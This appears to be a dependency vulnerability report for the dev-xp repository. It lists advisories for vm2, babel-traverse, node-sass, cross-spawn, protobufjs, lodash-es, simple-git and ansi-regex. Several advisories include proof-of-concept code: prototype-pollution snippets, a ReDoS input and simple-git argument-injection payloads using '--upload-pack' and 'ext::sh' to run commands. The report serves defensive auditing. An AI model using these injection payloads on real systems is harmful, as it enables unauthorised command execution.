RayBenefield/dev-xp
Find, fix and prevent vulnerabilities in your code.
critical severity
- Vulnerable module: vm2
- Introduced through: firebase-tools@9.23.3
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › proxy-agent@5.0.0 › pac-proxy-agent@5.0.0 › pac-resolver@5.0.1 › degenerator@3.0.4 › vm2@3.9.19
Overview
vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) due to insufficient checks which allow an attacker to escape the sandbox.
Note:
According to the maintainer, the security issue cannot be properly addressed and the library will be discontinued.
Remediation
There is no fixed version for vm2
.
References
critical severity
- Vulnerable module: vm2
- Introduced through: firebase-tools@9.23.3
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › proxy-agent@5.0.0 › pac-proxy-agent@5.0.0 › pac-resolver@5.0.1 › degenerator@3.0.4 › vm2@3.9.19
Overview
vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) such that the Promise
handler sanitization can be bypassed, allowing attackers to escape the sandbox.
Note:
According to the maintainer, the security issue cannot be properly addressed and the library will be discontinued.
Remediation
There is no fixed version for vm2
.
References
critical severity
- Vulnerable module: babel-traverse
- Introduced through: babel-core@6.26.3 and babel-plugin-transform-async-to-generator@6.24.1
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-core@6.26.3 › babel-traverse@6.26.0
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-core@6.26.3 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-plugin-transform-async-to-generator@6.24.1 › babel-helper-remap-async-to-generator@6.24.1 › babel-traverse@6.26.0
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-core@6.26.3 › babel-helpers@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-plugin-transform-async-to-generator@6.24.1 › babel-helper-remap-async-to-generator@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-plugin-transform-async-to-generator@6.24.1 › babel-helper-remap-async-to-generator@6.24.1 › babel-helper-function-name@6.24.1 › babel-traverse@6.26.0
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-plugin-transform-async-to-generator@6.24.1 › babel-helper-remap-async-to-generator@6.24.1 › babel-helper-function-name@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
…and 4 more
Overview
Affected versions of this package are vulnerable to Incomplete List of Disallowed Inputs when using plugins that rely on the path.evaluate()
or path.evaluateTruthy()
internal Babel methods.
Note:
This is only exploitable if the attacker uses known affected plugins such as @babel/plugin-transform-runtime
, @babel/preset-env
when using its useBuiltIns
option, and any "polyfill provider" plugin that depends on @babel/helper-define-polyfill-provider
. No other plugins under the @babel/
namespace are impacted, but third-party plugins might be.
Users that only compile trusted code are not impacted.
Workaround
Users who are unable to upgrade the library can upgrade the affected plugins instead, to avoid triggering the vulnerable code path in affected @babel/traverse
.
Remediation
There is no fixed version for babel-traverse
.
References
high severity
- Vulnerable module: node-sass
- Introduced through: node-sass@5.0.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0
Overview
node-sass is a Node.js bindings package for libsass.
Affected versions of this package are vulnerable to NULL Pointer Dereference in the function Sass::Functions::selector_append
which could be leveraged by an attacker to cause a denial of service (application crash) or possibly have unspecified other impact. node-sass
is affected by this vulnerability due to its bundled usage of libsass
.
Remediation
There is no fixed version for node-sass
.
References
high severity
- Vulnerable module: node-sass
- Introduced through: node-sass@5.0.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0
Overview
node-sass is a Node.js bindings package for libsass.
Affected versions of this package are vulnerable to Use After Free via the SharedPtr
class in SharedPtr.cpp
(or SharedPtr.hpp
) that may cause a denial of service (application crash) or possibly have unspecified other impact. Note: node-sass
is affected by this vulnerability due to its bundled usage of the libsass
package.
Details
A cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, <
can be coded as <
; and >
can be coded as >
; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses <
and >
as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
Type | Origin | Description |
---|---|---|
Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
Mutated | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as
?
,&
,/
,<
,>
and spaces to their respective HTML or URL encoded equivalents. - Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
There is no fixed version for node-sass
.
References
high severity
- Vulnerable module: cross-spawn
- Introduced through: execa@0.8.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › execa@0.8.0 › cross-spawn@5.1.0Remediation: Upgrade to execa@0.10.0.
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.
PoC
const { argument } = require('cross-spawn/lib/util/escape');
var str = "";
for (var i = 0; i < 1000000; i++) {
str += "\\";
}
str += "◎";
console.log("start")
argument(str)
console.log("end")
// run `npm install cross-spawn` and `node attack.js`
// then the program will stuck forever with high CPU usage
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade cross-spawn
to version 6.0.6, 7.0.5 or higher.
References
high severity
- Vulnerable module: protobufjs
- Introduced through: firebase-admin@9.12.0 and firebase-tools@9.23.3
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-admin@9.12.0 › @google-cloud/firestore@4.15.1 › google-gax@2.30.5 › protobufjs@6.11.3Remediation: Upgrade to firebase-admin@11.1.0.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › @google-cloud/pubsub@2.19.4 › google-gax@2.30.3 › protobufjs@6.11.2Remediation: Upgrade to firebase-tools@11.1.0.
Overview
protobufjs is a protocol buffer for JavaScript (& TypeScript).
Affected versions of this package are vulnerable to Prototype Pollution. A user-controlled protobuf message can be used by an attacker to pollute the prototype of Object.prototype
by adding and overwriting its data and functions. Exploitation can involve:
using the function parse to parse protobuf messages on the fly,
loading
.proto
files by usingload/loadSync
functions, orproviding untrusted input to the functions
ReflectionObject.setParsedOption
andutil.setProperty
Note:
This is a different issue from CVE-2022-25878
Users who use this package from npm can rest assured that version 7.2.4 includes the fixed code.
Developers using this package from a different CDN should consider 7.2.5 as the fixed version.
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__
, constructor
and prototype
. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype
are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
Unsafe
Object
recursive mergeProperty definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__
defined with Object.defineProperty()
, the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object
and the source of Object
as defined by the attacker. Properties are then copied on the Object
prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source)
.
lodash
and Hoek
are examples of libraries susceptible to recursive merge attacks.
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue
. myValue
is then assigned to the prototype of the class of the object.
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
Type | Origin | Short description |
---|---|---|
Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf ). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object . In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr) . In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin , then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true , they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
Freeze the prototype— use
Object.freeze (Object.prototype)
.Require schema validation of JSON input.
Avoid using unsafe recursive merge functions.
Consider using objects without prototypes (for example,
Object.create(null)
), breaking the prototype chain and preventing pollution.As a best practice use
Map
instead ofObject
.
For more information on this vulnerability type:
Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade protobufjs
to version 6.11.4, 7.2.4 or higher.
References
high severity
- Vulnerable module: lodash-es
- Introduced through: rete-context-menu-plugin@0.6.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rete-context-menu-plugin@0.6.0 › lodash-es@4.17.15Remediation: Upgrade to rete-context-menu-plugin@2.0.0.
Overview
Affected versions of this package are vulnerable to Prototype Pollution. The function zipObjectDeep
can be tricked into adding or modifying properties of the Object prototype. These properties will be present on all objects.
PoC
const _ = require('lodash');
_.zipObjectDeep(['__proto__.z'],[123]);
console.log(z); // 123
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__
, constructor
and prototype
. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype
are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
Unsafe
Object
recursive mergeProperty definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__
defined with Object.defineProperty()
, the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object
and the source of Object
as defined by the attacker. Properties are then copied on the Object
prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source)
.
lodash
and Hoek
are examples of libraries susceptible to recursive merge attacks.
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue
. myValue
is then assigned to the prototype of the class of the object.
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
Type | Origin | Short description |
---|---|---|
Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf ). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object . In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr) . In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin , then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true , they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
Freeze the prototype— use
Object.freeze (Object.prototype)
.Require schema validation of JSON input.
Avoid using unsafe recursive merge functions.
Consider using objects without prototypes (for example,
Object.create(null)
), breaking the prototype chain and preventing pollution.As a best practice use
Map
instead ofObject
.
For more information on this vulnerability type:
Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade lodash-es
to version 4.17.20 or higher.
References
high severity
- Vulnerable module: protobufjs
- Introduced through: firebase-tools@9.23.3
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › @google-cloud/pubsub@2.19.4 › google-gax@2.30.3 › protobufjs@6.11.2Remediation: Upgrade to firebase-tools@11.1.0.
Overview
protobufjs is a protocol buffer for JavaScript (& TypeScript).
Affected versions of this package are vulnerable to Prototype Pollution which can allow an attacker to add/modify properties of the Object.prototype
.
This vulnerability can occur in multiple ways:
- by providing untrusted user input to
util.setProperty
or toReflectionObject.setParsedOption
functions - by parsing/loading
.proto
files
PoC
// npm i protobufjs
const protobuf = require("protobufjs");
// poc 1 - util.setProperty()
protobuf.util.setProperty({}, "__proto__.polluted1", "polluted1");
console.log({}.polluted1);
// poc 2 - ReflectionObject().setParsedOption()
let obj = new protobuf.ReflectionObject("Test")
let dst = {}
obj.setParsedOption(dst, "polluted2", "__proto__.polluted2");
console.log({}.polluted2);
// poc 3 - protobuf.parse()
let p =
`
option (foo).__proto__.polluted3 = "polluted3";
`
protobuf.parse(p)
console.log({}.polluted3)
// poc 4 - protobuf.load()
/* poc.proto
option (foo).__proto__.polluted4 = "polluted4";
syntax = "proto3";
message Message {
string bar = 1;
}
*/
protobuf.load("poc.proto", function(err, root) {
if (err)
throw err;
console.log({}.polluted4)
});
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__
, constructor
and prototype
. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype
are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
Unsafe
Object
recursive mergeProperty definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__
defined with Object.defineProperty()
, the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object
and the source of Object
as defined by the attacker. Properties are then copied on the Object
prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source)
.
lodash
and Hoek
are examples of libraries susceptible to recursive merge attacks.
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue
. myValue
is then assigned to the prototype of the class of the object.
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
Type | Origin | Short description |
---|---|---|
Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf ). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object . In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr) . In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin , then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true , they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
Freeze the prototype— use
Object.freeze (Object.prototype)
.Require schema validation of JSON input.
Avoid using unsafe recursive merge functions.
Consider using objects without prototypes (for example,
Object.create(null)
), breaking the prototype chain and preventing pollution.As a best practice use
Map
instead ofObject
.
For more information on this vulnerability type:
Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade protobufjs
to version 6.10.3, 6.11.3 or higher.
References
high severity
- Vulnerable module: simple-git
- Introduced through: simple-git@1.132.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › simple-git@1.132.0Remediation: Upgrade to simple-git@3.3.0.
Overview
simple-git is a light weight interface for running git commands in any node.js application.
Affected versions of this package are vulnerable to Command Injection via argument injection. When calling the .fetch(remote, branch, handlerFn)
function, both the remote
and branch
parameters are passed to the git fetch
subcommand. By injecting some git options it was possible to get arbitrary command execution.
PoC
// npm i simple-git
const simpleGit = require('simple-git');
const git = simpleGit();
let callback = () => {};
git.init(); // or git init
let origin1 = 'origin';
let ref1 = "--upload-pack=touch ./HELLO1;";
git.fetch(origin1, ref1, callback); // git [ 'fetch', 'origin', '--upload-pack=touch ./HELLO1;' ]
let origin2 = "--upload-pack=touch ./HELLO2;";
let ref2 = "foo";
git.fetch(origin2, ref2, callback); // git [ 'fetch', '--upload-pack=touch ./HELLO2;', 'foo' ]
let origin3 = 'origin';
let ref3 = "--upload-pack=touch ./HELLO3;";
git.fetch(origin3, ref3, { '--depth': '2' }, callback); // git [ 'fetch', '--depth=2', 'origin', '--upload-pack=touch ./HELLO3;' ]
// ls -la
Remediation
Upgrade simple-git
to version 3.3.0 or higher.
References
high severity
- Vulnerable module: simple-git
- Introduced through: simple-git@1.132.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › simple-git@1.132.0Remediation: Upgrade to simple-git@3.5.0.
Overview
simple-git is a light weight interface for running git commands in any node.js application.
Affected versions of this package are vulnerable to Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') due to an incomplete fix of CVE-2022-24433 which only patches against the git fetch
attack vector.
A similar use of the --upload-pack
feature of git is also supported for git clone, which the prior fix didn't cover.
PoC
const simpleGit = require('simple-git')
const git2 = simpleGit()
git2.clone('file:///tmp/zero123', '/tmp/example-new-repo', ['--upload-pack=touch /tmp/pwn']);
Remediation
Upgrade simple-git
to version 3.5.0 or higher.
References
high severity
- Vulnerable module: simple-git
- Introduced through: simple-git@1.132.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › simple-git@1.132.0Remediation: Upgrade to simple-git@3.15.0.
Overview
simple-git is a light weight interface for running git commands in any node.js application.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) when enabling the ext
transport protocol, which makes it exploitable via clone()
method.
This vulnerability exists due to an incomplete fix of CVE-2022-24066.
PoC
const simpleGit = require('simple-git')
const git2 = simpleGit()
git2.clone('ext::sh -c touch% /tmp/pwn% >&2', '/tmp/example-new-repo', ["-c", "protocol.ext.allow=always"]);
Remediation
Upgrade simple-git
to version 3.15.0 or higher.
References
high severity
- Vulnerable module: simple-git
- Introduced through: simple-git@1.132.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › simple-git@1.132.0Remediation: Upgrade to simple-git@3.16.0.
Overview
simple-git is a light weight interface for running git commands in any node.js application.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) via the clone()
, pull()
, push()
and listRemote()
methods, due to improper input sanitization.
This vulnerability exists due to an incomplete fix of CVE-2022-25912.
PoC
const simpleGit = require('simple-git');
let git = simpleGit();
git.clone('-u touch /tmp/pwn', 'file:///tmp/zero12');
git.pull('--upload-pack=touch /tmp/pwn0', 'master');
git.push('--receive-pack=touch /tmp/pwn1', 'master');
git.listRemote(['--upload-pack=touch /tmp/pwn2', 'main']);
Remediation
Upgrade simple-git
to version 3.16.0 or higher.
References
high severity
- Vulnerable module: ansi-regex
- Introduced through: renderkid@2.0.7, firebase-tools@9.23.3 and others
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › renderkid@2.0.7 › strip-ansi@3.0.1 › ansi-regex@2.1.1Remediation: Upgrade to renderkid@3.0.0.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › cli-color@1.4.0 › ansi-regex@2.1.1Remediation: Upgrade to firebase-tools@11.4.1.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0 › chalk@1.1.3 › has-ansi@2.0.0 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0 › chalk@1.1.3 › strip-ansi@3.0.1 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-core@6.26.3 › babel-code-frame@6.26.0 › chalk@1.1.3 › has-ansi@2.0.0 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › superstatic@7.1.0 › chalk@1.1.3 › has-ansi@2.0.0 › ansi-regex@2.1.1Remediation: Upgrade to firebase-tools@11.14.0.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-core@6.26.3 › babel-code-frame@6.26.0 › chalk@1.1.3 › strip-ansi@3.0.1 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › superstatic@7.1.0 › chalk@1.1.3 › strip-ansi@3.0.1 › ansi-regex@2.1.1Remediation: Upgrade to firebase-tools@11.14.0.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › superstatic@7.1.0 › string-length@1.0.1 › strip-ansi@3.0.1 › ansi-regex@2.1.1Remediation: Upgrade to firebase-tools@11.14.0.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0 › npmlog@4.1.2 › gauge@2.7.4 › strip-ansi@3.0.1 › ansi-regex@2.1.1Remediation: Upgrade to node-sass@7.0.0.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-core@6.26.3 › babel-traverse@6.26.0 › babel-code-frame@6.26.0 › chalk@1.1.3 › has-ansi@2.0.0 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-core@6.26.3 › babel-traverse@6.26.0 › babel-code-frame@6.26.0 › chalk@1.1.3 › strip-ansi@3.0.1 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0 › npmlog@4.1.2 › gauge@2.7.4 › string-width@1.0.2 › strip-ansi@3.0.1 › ansi-regex@2.1.1Remediation: Upgrade to node-sass@7.0.0.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0 › node-gyp@7.1.2 › npmlog@4.1.2 › gauge@2.7.4 › strip-ansi@3.0.1 › ansi-regex@2.1.1Remediation: Upgrade to node-sass@7.0.1.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-wick@4.0.3 › node-pre-gyp@0.12.0 › npmlog@4.1.2 › gauge@2.7.4 › strip-ansi@3.0.1 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › wick-downloader@0.3.4 › node-pre-gyp@0.14.0 › npmlog@4.1.2 › gauge@2.7.4 › strip-ansi@3.0.1 › ansi-regex@2.1.1
-
